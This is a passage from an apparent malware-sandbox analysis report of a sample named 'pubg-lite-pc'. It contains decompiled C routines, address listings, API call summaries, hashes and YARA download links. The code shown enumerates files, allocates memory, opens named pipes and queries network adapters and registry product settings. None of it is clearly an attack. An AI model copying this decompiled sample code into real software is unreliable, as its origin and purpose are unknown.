								asm("lock xadd [eax+0xc], ecx");
								if((_t65 | 0xffffffff) - 1 <= 0) {
									 *((intOrPtr*)( *((intOrPtr*)( *_t49)) + 4))(_t49);
								}
								 *[fs:0x0] = _v20;
								return _t57;
								goto L28;
							}
							asm("sbb eax, eax");
							_t47 = _t46 | 0x00000001;
							goto L25;
						} else {
							if( *_t76 != 0x5c) {
								if(_t60 < 1) {
									goto L17;
								} else {
									goto L9;
								}
							} else {
								if(_t60 < 1) {
									goto L17;
								} else {
									if(_t76[1] != 0x5c) {
										L9:
										if(_t76[1] != 0x3a) {
											goto L15;
										} else {
											goto L10;
										}
									} else {
										L10:
										L6D98C450(_t74,  &_v612, 0, 0x250);
										_t36 = FindFirstFileW(_t76,  &_v612); // executed
										_v620 = 0x6d9c8100;
										_v616 = _t36;
										_v8 = 0;
										if(_t36 == 0xffffffff) {
											GetLastError();
											_v8 = 0xffffffff;
											_v620 = 0x6d9c8100;
											_t36 = FindClose(0xffffffff);
											_v616 = 0;
										} else {
											_v8 = 0xffffffff;
											_v620 = 0x6d9c8100;
											if(_t36 != 0) {
												_t36 = FindClose(_t36);
												_v616 = 0;
											}
										}
									}
									goto L16;
								}
							}
						}
					}
				} else {
					L16:
					 *[fs:0x0] = _v16;
					return L6D98A13F(_v20 ^ _t79);
				}
				L28:
			}

































                                                                                                0x6d982cf0
                                                                                                0x6d982cf3
                                                                                                0x6d982cf5
                                                                                                0x6d982d00
                                                                                                0x6d982d01
                                                                                                0x6d982d07
                                                                                                0x6d982d0c
                                                                                                0x6d982d0e
                                                                                                0x6d982d12
                                                                                                0x6d982d13
                                                                                                0x6d982d16
                                                                                                0x6d982d1c
                                                                                                0x6d982d1e
                                                                                                0x6d982d23
                                                                                                0x6d982d30
                                                                                                0x6d982e01
                                                                                                0x00000000
                                                                                                0x6d982d36
                                                                                                0x6d982d38
                                                                                                0x6d982e25
                                                                                                0x6d982e2a
                                                                                                0x6d982e2f
                                                                                                0x6d982e30
                                                                                                0x6d982e33
                                                                                                0x6d982e35
                                                                                                0x6d982e40
                                                                                                0x6d982e41
                                                                                                0x6d982e42
                                                                                                0x6d982e43
                                                                                                0x6d982e4a
                                                                                                0x6d982e4e
                                                                                                0x6d982e54
                                                                                                0x6d982e5c
                                                                                                0x6d982e61
                                                                                                0x6d982e68
                                                                                                0x6d982e6d
                                                                                                0x6d982e70
                                                                                                0x6d982e70
                                                                                                0x6d982e76
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d982e7b
                                                                                                0x6d982e92
                                                                                                0x6d982e92
                                                                                                0x6d982e7d
                                                                                                0x6d982e7d
                                                                                                0x6d982e85
                                                                                                0x00000000
                                                                                                0x6d982e87
                                                                                                0x6d982e87
                                                                                                0x6d982e8a
                                                                                                0x6d982e90
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d982e90
                                                                                                0x6d982e85
                                                                                                0x6d982e9b
                                                                                                0x6d982e9d
                                                                                                0x6d982ea0
                                                                                                0x6d982ead
                                                                                                0x6d982eb0
                                                                                                0x6d982eb8
                                                                                                0x6d982ebf
                                                                                                0x6d982ebf
                                                                                                0x6d982ec7
                                                                                                0x6d982ed3
                                                                                                0x00000000
                                                                                                0x6d982ed3
                                                                                                0x6d982e96
                                                                                                0x6d982e98
                                                                                                0x00000000
                                                                                                0x6d982d3e
                                                                                                0x6d982d42
                                                                                                0x6d982d59
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d982d44
                                                                                                0x6d982d47
                                                                                                0x00000000
                                                                                                0x6d982d4d
                                                                                                0x6d982d52
                                                                                                0x6d982d5f
                                                                                                0x6d982d64
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d982d54
                                                                                                0x6d982d6a
                                                                                                0x6d982d78
                                                                                                0x6d982d88
                                                                                                0x6d982d8e
                                                                                                0x6d982d98
                                                                                                0x6d982d9e
                                                                                                0x6d982da8
                                                                                                0x6d982dd4
                                                                                                0x6d982ddc
                                                                                                0x6d982de5
                                                                                                0x6d982def
                                                                                                0x6d982df5
                                                                                                0x6d982daa
                                                                                                0x6d982daa
                                                                                                0x6d982db1
                                                                                                0x6d982dbd
                                                                                                0x6d982dc0
                                                                                                0x6d982dc6
                                                                                                0x6d982dc6
                                                                                                0x6d982dd0
                                                                                                0x6d982da8
                                                                                                0x00000000
                                                                                                0x6d982d52
                                                                                                0x6d982d47
                                                                                                0x6d982d42
                                                                                                0x6d982d38
                                                                                                0x6d982d25
                                                                                                0x6d982e06
                                                                                                0x6d982e0e
                                                                                                0x6d982e24
                                                                                                0x6d982e24
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(?,?,?,E85BFA76,?), ref: 6D982D88
                                                                                                • FindClose.KERNEL32(00000000), ref: 6D982DC0
                                                                                                  • Part of subcall function 6D966820: RtlAllocateHeap.NTDLL(00000000,00000000,?,E85BFA76,00000000,6D9A7310,000000FF,?,?,6D9E3A44,?,6D98353D,80004005), ref: 6D96686A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66249601423.000000006D941000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D940000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66249463542.000000006D940000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66254569554.000000006D9BB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256348275.000000006D9E5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256907548.000000006D9F1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6d940000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Find$AllocateCloseFileFirstHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1673784098-0
                                                                                                • Opcode ID: e01a853d090b8ebd35c14d203cd86f0745d22a7032ac9cf525099fc14f301713
                                                                                                • Instruction ID: 4be403590052dcacc8bc82cc21be432e4dbd453453735e2b3b400ec32fca147d
                                                                                                • Opcode Fuzzy Hash: e01a853d090b8ebd35c14d203cd86f0745d22a7032ac9cf525099fc14f301713
                                                                                                • Instruction Fuzzy Hash: F131BF31808319CBDB39DF64C94876ABBB8FB05B24F104B9DD925A72C2D7719944CB85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A4335B Relevance: 5.0, APIs: 4, Instructions: 41memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetProcessHeap.KERNEL32(00000008,00000008,?,0092F647,?,?,0092F3F4,?), ref: 00A43360
                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,0092F3F4,?), ref: 00A43367
                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,0092F3F4,?), ref: 00A433AD
                                                                                                • HeapFree.KERNEL32(00000000,?,?,0092F3F4,?), ref: 00A433B4
                                                                                                  • Part of subcall function 00A431F9: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00A433A3,00000000,?,?,0092F3F4,?), ref: 00A4321D
                                                                                                  • Part of subcall function 00A431F9: HeapAlloc.KERNEL32(00000000,?,?,0092F3F4,?), ref: 00A43224
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Heap$Process$Alloc$Free
                                                                                                • String ID:
                                                                                                • API String ID: 1864747095-0
                                                                                                • Opcode ID: 64cd6d13f53402f35de31d845aff726732265e5c78eb589aead1841a02a9017e
                                                                                                • Instruction ID: d674b10d4f84e34a6516ab40dd0b41deb31c701ac71f4f229c4ff29e606f1f16
                                                                                                • Opcode Fuzzy Hash: 64cd6d13f53402f35de31d845aff726732265e5c78eb589aead1841a02a9017e
                                                                                                • Instruction Fuzzy Hash: ECF0B4377846129BCF24EBF87C0DA6F2AA8AFC0761711442AF542CA255DE60E8024B60
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009B34A0 Relevance: 4.6, APIs: 3, Instructions: 92fileCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • FindFirstFileW.KERNEL32(?,00000000,00000000,?,00000000), ref: 009B353F
                                                                                                • FindClose.KERNEL32(00000000), ref: 009B359E
                                                                                                  • Part of subcall function 00928FC0: RtlAllocateHeap.NTDLL(?,00000000,?,F4D3B90A,00000000,00A65840,000000FF,?,?,00AF91CC,?,009EAA18,80004005,F4D3B90A), ref: 0092900A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Find$AllocateCloseFileFirstHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1673784098-0
                                                                                                • Opcode ID: 37329d36f79f0d0739bdabbc955e32bae47352562ab8d776b32c04e2079158f7
                                                                                                • Instruction ID: 8359d313ac842857744e14973dc19b77cda93f916a73e60ce037de4bf7240563
                                                                                                • Opcode Fuzzy Hash: 37329d36f79f0d0739bdabbc955e32bae47352562ab8d776b32c04e2079158f7
                                                                                                • Instruction Fuzzy Hash: 4631D470905618DBCB34DF54CE48BAAB7B8EF44720F20825AE81A97380E7B15A45CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009EAA20 Relevance: 3.1, APIs: 2, Instructions: 85filepipeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateNamedPipeW.KERNEL32(?,00000003,00000006,000000FF,00007F90,00007F90,00001388,00000000,?,F4D3B90A,F4D3B90A,?,?,?,00000000,00A8B925), ref: 009EAAA8
                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000,?,F4D3B90A,F4D3B90A,?,?,?,00000000,00A8B925,000000FF), ref: 009EAACA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: Create$FileNamedPipe
                                                                                                • String ID:
                                                                                                • API String ID: 1328467360-0
                                                                                                • Opcode ID: 27ba8850770b253ee2d3cfd0d8766a7dc8a9e9e65b17a7b2988ec2f226b38e3a
                                                                                                • Instruction ID: bdbf1293f4654b9e7dc4b537937964e4e796b4a3f2c23c1731b527ade4cdc574
                                                                                                • Opcode Fuzzy Hash: 27ba8850770b253ee2d3cfd0d8766a7dc8a9e9e65b17a7b2988ec2f226b38e3a
                                                                                                • Instruction Fuzzy Hash: 2E31F631A84745AFD731CF14CC01B9ABBA9EB05720F10866EF9A9AB7D1DB71B901CB50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009E9970 Relevance: 2.9, Strings: 2, Instructions: 368COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                • SELECT `Value` FROM `Property` WHERE `Property` = '%s', xrefs: 009E99DE
                                                                                                • PackageCode, xrefs: 009E9CBB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: PackageCode$SELECT `Value` FROM `Property` WHERE `Property` = '%s'
                                                                                                • API String ID: 0-2409377028
                                                                                                • Opcode ID: 6360443f83fa3d7ba035a9a6aa4e76a931d0cab31142b0421a1efdae27f80580
                                                                                                • Instruction ID: b02d80fb9b0a5f35781d91b684d80990dd92e4ef46aa7dd4f65b247b91cf2e43
                                                                                                • Opcode Fuzzy Hash: 6360443f83fa3d7ba035a9a6aa4e76a931d0cab31142b0421a1efdae27f80580
                                                                                                • Instruction Fuzzy Hash: AAD1FE71A00249EFDB11DFA9DC48BAEBBB8FF45310F148569E815EB291DB74AD04CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00A456AD Relevance: 1.7, APIs: 1, Instructions: 172COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00A463A3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: FeaturePresentProcessor
                                                                                                • String ID:
                                                                                                • API String ID: 2325560087-0
                                                                                                • Opcode ID: b50207f7089d35ebd25e0900a029b1d13b8cbbc0826a8952ee325701a64988f6
                                                                                                • Instruction ID: 104ec2eaad99d7453c88ba58402d69d1a973adefdaa3d7b2893ef254f6f33ea5
                                                                                                • Opcode Fuzzy Hash: b50207f7089d35ebd25e0900a029b1d13b8cbbc0826a8952ee325701a64988f6
                                                                                                • Instruction Fuzzy Hash: 5251DFB5D00205DFDB19CFA8D9897AEBBF5FB88310F24852AD805EB294DB70DA41CB51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6D9645D0 Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 75%
                                                                                                			E6D9645D0() {
				signed int _v4;
				intOrPtr _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				signed int _t18;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr* _t33;
				void* _t35;
				void* _t37;
				intOrPtr _t40;
				intOrPtr _t41;
				intOrPtr* _t42;
				intOrPtr _t43;
				void* _t44;
				intOrPtr* _t47;
				void* _t48;

				_t42 = _t33;
				_v4 = 0x288;
				_t31 =  *((intOrPtr*)(_t42 + 4));
				_t40 =  *_t42;
				_t35 = _t31 - _t40;
				if(_t35 <= 0x288) {
					if(__eflags >= 0) {
						goto L7;
					}
					__eflags =  *((intOrPtr*)(_t42 + 8)) - _t40 - 0x288;
					if( *((intOrPtr*)(_t42 + 8)) - _t40 >= 0x288) {
						__eflags = 0x288;
						L6D98C450(_t42, _t31, 0, 0x288);
						_t48 = _t48 + 0xc;
						_t29 = 0x288 - _t35 + _t31;
						goto L6;
					} else {
						L6D9653B0(_t31, _t42, _t42, 0x288, _t35);
						goto L7;
					}
				} else {
					_t29 = _t40 + 0x288;
					L6:
					 *((intOrPtr*)(_t42 + 4)) = _t29;
					L7:
					_t47 = __imp__GetAdaptersInfo;
					while(1) {
						_t18 =  *_t47( *_t42,  &_v4); // executed
						if(_t18 != 0x6f) {
							break;
						}
						_t32 =  *((intOrPtr*)(_t42 + 4));
						_t41 =  *_t42;
						_t37 = _t32 - _t41;
						_t43 = _v12;
						if(_t43 >= _t37) {
							if(__eflags > 0) {
								__eflags = _t43 -  *((intOrPtr*)(_t42 + 8)) - _t41;
								if(_t43 <=  *((intOrPtr*)(_t42 + 8)) - _t41) {
									_t44 = _t43 - _t37;
									L6D98C450(_t42, _t32, 0, _t44);
									_t48 = _t48 + 0xc;
									 *((intOrPtr*)(_t42 + 4)) = _t44 + _t32;
								} else {
									L6D9653B0(_t32, _t42, _t42, _t43, _t37);
								}
							}
						} else {
							 *((intOrPtr*)(_t42 + 4)) = _t41 + _t43;
						}
					}
					__eflags = _t18;
					_t16 = _t18 == 0;
					__eflags = _t16;
					return _t18 & 0xffffff00 | _t16;
				}
			}






















                                                                                                0x6d9645d5
                                                                                                0x6d9645d7
                                                                                                0x6d9645df
                                                                                                0x6d9645e4
                                                                                                0x6d9645e6
                                                                                                0x6d9645ee
                                                                                                0x6d9645f8
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d9645ff
                                                                                                0x6d964604
                                                                                                0x6d96461a
                                                                                                0x6d964620
                                                                                                0x6d964625
                                                                                                0x6d964628
                                                                                                0x00000000
                                                                                                0x6d964606
                                                                                                0x6d96460e
                                                                                                0x00000000
                                                                                                0x6d96460e
                                                                                                0x6d9645f0
                                                                                                0x6d9645f0
                                                                                                0x6d96462b
                                                                                                0x6d96462b
                                                                                                0x6d96462e
                                                                                                0x6d96462e
                                                                                                0x6d964634
                                                                                                0x6d96463b
                                                                                                0x6d964640
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d964642
                                                                                                0x6d964647
                                                                                                0x6d964649
                                                                                                0x6d96464b
                                                                                                0x6d964651
                                                                                                0x6d96465b
                                                                                                0x6d964662
                                                                                                0x6d964664
                                                                                                0x6d964671
                                                                                                0x6d964677
                                                                                                0x6d96467f
                                                                                                0x6d964682
                                                                                                0x6d964666
                                                                                                0x6d96466a
                                                                                                0x6d96466a
                                                                                                0x6d964664
                                                                                                0x6d964653
                                                                                                0x6d964656
                                                                                                0x6d964656
                                                                                                0x6d964651
                                                                                                0x6d964689
                                                                                                0x6d96468c
                                                                                                0x6d96468c
                                                                                                0x6d964691
                                                                                                0x6d964691

                                                                                                APIs
                                                                                                • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 6D96463B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66249601423.000000006D941000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D940000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66249463542.000000006D940000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66254569554.000000006D9BB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256348275.000000006D9E5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256907548.000000006D9F1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6d940000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: AdaptersInfo
                                                                                                • String ID:
                                                                                                • API String ID: 3177971545-0
                                                                                                • Opcode ID: 6b4960e86d75fcc1cb757ad7f9fb1d6c7aaad603538f719837bf4d2dbe650796
                                                                                                • Instruction ID: 52f70cfaff49b360987706913c230d08b4bb9cdd722b4d7b344eb37528cf253d
                                                                                                • Opcode Fuzzy Hash: 6b4960e86d75fcc1cb757ad7f9fb1d6c7aaad603538f719837bf4d2dbe650796
                                                                                                • Instruction Fuzzy Hash: 02210775609152AFE355CEB8C9A497AF7A8FB49304F518639E20583640EB61EC14CFB0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0094EF90 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(009B1BA0), ref: 0094EFBE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                • String ID:
                                                                                                • API String ID: 3192549508-0
                                                                                                • Opcode ID: be8f784a1b836b5007e7b0a87f9afdd264d7d6326c50d06002cc8fb602a29c42
                                                                                                • Instruction ID: 274261b71f5aec31690948e4a43306fb313b1ff7d52a024f3a867b196b2bccfe
                                                                                                • Opcode Fuzzy Hash: be8f784a1b836b5007e7b0a87f9afdd264d7d6326c50d06002cc8fb602a29c42
                                                                                                • Instruction Fuzzy Hash: 0FE0CDFAA04290AFD710E3A49D1DF5F7F98FBE5B60F494455F24053262DBB058058772
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009F06F0 Relevance: .2, Instructions: 154COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: HeapProcess
                                                                                                • String ID:
                                                                                                • API String ID: 54951025-0
                                                                                                • Opcode ID: dddf023de17db926f2bfeab4de485e8efd994a72cf72702ada4bc8514545b088
                                                                                                • Instruction ID: db4ee8d19bd940357507a477407f98db23b5b62bc626974ba4527a1ad987a868
                                                                                                • Opcode Fuzzy Hash: dddf023de17db926f2bfeab4de485e8efd994a72cf72702ada4bc8514545b088
                                                                                                • Instruction Fuzzy Hash: 6C6168B0900744DFE710CF28C54879ABBE4FF59318F108A5DD98A9B382D7B9E609CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009EA350 Relevance: 40.5, APIs: 4, Strings: 19, Instructions: 220registryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 0 9ea350-9ea3c8 RegOpenKeyExW 2 9ea3ce-9ea3ff RegQueryValueExW 0->2 3 9ea632-9ea64b 0->3 4 9ea44f-9ea47a RegQueryValueExW 2->4 5 9ea401-9ea413 call a3e1d0 2->5 6 9ea65e-9ea679 call a4566b 3->6 7 9ea64d-9ea654 RegCloseKey 3->7 4->3 10 9ea480-9ea491 4->10 15 9ea424-9ea43b call a3e1d0 5->15 16 9ea415-9ea422 5->16 7->6 13 9ea49d-9ea49f 10->13 14 9ea493-9ea49b 10->14 13->3 17 9ea4a5-9ea4ac 13->17 14->13 14->14 24 9ea43d 15->24 25 9ea442-9ea448 15->25 19 9ea44a 16->19 18 9ea4b0-9ea4be call a3e1d0 17->18 26 9ea4c9-9ea4d7 call a3e1d0 18->26 27 9ea4c0-9ea4c4 18->27 19->4 24->25 25->19 32 9ea4d9-9ea4dd 26->32 33 9ea4e2-9ea4f0 call a3e1d0 26->33 28 9ea604 27->28 31 9ea60b-9ea618 28->31 34 9ea62a-9ea62c 31->34 35 9ea61a 31->35 32->28 39 9ea4fb-9ea509 call a3e1d0 33->39 40 9ea4f2-9ea4f6 33->40 34->3 34->18 37 9ea620-9ea628 35->37 37->34 37->37 43 9ea50b-9ea50f 39->43 44 9ea514-9ea522 call a3e1d0 39->44 40->28 43->28 47 9ea52d-9ea53b call a3e1d0 44->47 48 9ea524-9ea528 44->48 51 9ea53d-9ea541 47->51 52 9ea546-9ea554 call a3e1d0 47->52 48->28 51->28 55 9ea55f-9ea56d call a3e1d0 52->55 56 9ea556-9ea55a 52->56 59 9ea56f-9ea574 55->59 60 9ea579-9ea587 call a3e1d0 55->60 56->28 61 9ea601 59->61 64 9ea589-9ea58e 60->64 65 9ea590-9ea59e call a3e1d0 60->65 61->28 64->61 68 9ea5a7-9ea5b5 call a3e1d0 65->68 69 9ea5a0-9ea5a5 65->69 72 9ea5be-9ea5cc call a3e1d0 68->72 73 9ea5b7-9ea5bc 68->73 69->61 76 9ea5ce-9ea5d3 72->76 77 9ea5d5-9ea5e3 call a3e1d0 72->77 73->61 76->61 80 9ea5ec-9ea5fa call a3e1d0 77->80 81 9ea5e5-9ea5ea 77->81 80->31 84 9ea5fc 80->84 81->61 84->61
                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNEL32(80000002,SYSTEM\CurrentControlSet\Control\ProductOptions,00000000,00020119,00000000), ref: 009EA3C0
                                                                                                • RegQueryValueExW.KERNEL32(00000000,ProductType,00000000,00000000,?), ref: 009EA3FB
                                                                                                • RegQueryValueExW.KERNEL32(00000000,ProductSuite,00000000,00000000,?,?), ref: 009EA476
                                                                                                • RegCloseKey.KERNEL32(00000000), ref: 009EA64E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
